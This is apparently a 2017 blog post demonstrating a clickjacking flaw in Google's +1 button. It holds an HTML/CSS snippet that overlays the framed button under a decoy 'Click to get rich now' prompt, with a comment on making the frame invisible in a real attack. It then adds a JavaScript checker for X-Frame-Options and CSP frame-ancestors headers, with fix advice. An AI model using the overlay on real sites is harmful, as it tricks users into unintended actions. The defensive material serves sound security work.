Sunday, 16 July 2017

Google G+1 ClickJacking BUG





The previous basic introduction tutorial - https://www.youtube.com/watch?v=cbgNHnMsaPg&t=192s



The snippet -

<style>
iframe { /* iframe from the victim site */
  width: 400px;
  height: 100px;
  position: absolute;
  top:0; left:0px;
  opacity: 1; /* kept visible for this demo; a real attack would use opacity: 0 */
  z-index: 1;
}
</style>

<div>Click to get rich now:</div>

<!-- The url from the victim site -->
<iframe src="https://plusone.google.com/_/+1/fastbutton?bsv&size=medium&hl=en-US&url=https://engineering.linkedin.com/security/our-private-bug-bounty-program-reducing-vulnerabilities-leveraging-expert-crowds"></iframe>

<button>Click here!</button>

<div>...And you're cool (I'm a cool hacker actually)!</div> 
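
The snippet above only works if the framed URL's response lets a third-party page embed it. The check below is an added example, not part of the original post: it reads a response's X-Frame-Options and Content-Security-Policy headers and reports whether a cross-origin parent could frame the page. The function names and the header sets passed to it are this example's own.

```javascript
// Added example (not from the original post). Header sets passed in are constructed samples.
// Classifies a response as 'blocked', 'allowlist' or 'frameable' for a third-party parent page.

function frameAncestors(policy) {
  // Source list of the frame-ancestors directive in one CSP policy, or null if absent.
  for (const directive of policy.split(';')) {
    const [name, ...sources] = directive.trim().toLowerCase().split(/\s+/);
    if (name === 'frame-ancestors') return sources;
  }
  return null;
}

function classifySources(sources) {
  // An empty list or 'none' matches nothing; 'self' excludes any third-party parent.
  if (sources.every(s => s === "'none'" || s === "'self'")) return 'blocked';
  if (sources.some(s => s === '*' || s === 'http:' || s === 'https:')) return 'frameable';
  return 'allowlist'; // only the listed origins may frame the page
}

function framingVerdict(headers) {
  // Header names are case-insensitive, so normalise them first.
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  // Several policies may arrive comma-joined; every one with frame-ancestors must allow the parent.
  const lists = (h['content-security-policy'] || '').split(',')
    .map(frameAncestors).filter(l => l !== null);
  if (lists.length > 0) {
    // When frame-ancestors is present, browsers use it instead of X-Frame-Options.
    const verdicts = lists.map(classifySources);
    if (verdicts.includes('blocked')) return 'blocked';
    return verdicts.includes('allowlist') ? 'allowlist' : 'frameable';
  }

  const xfo = new Set((h['x-frame-options'] || '').toLowerCase()
    .split(',').map(s => s.trim()).filter(Boolean));
  if (xfo.has('deny') || xfo.has('sameorigin')) return 'blocked';
  if (xfo.size > 1 && xfo.has('allowall')) return 'blocked'; // conflicting values fail closed
  // ALLOW-FROM and unknown values are not enforced by current browsers.
  return 'frameable';
}
```

A `frameable` verdict on a page that performs a state-changing action on click is the condition the snippet relies on; sending `Content-Security-Policy: frame-ancestors 'none'` (or `'self'`) together with `X-Frame-Options: DENY` for older browsers closes it.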
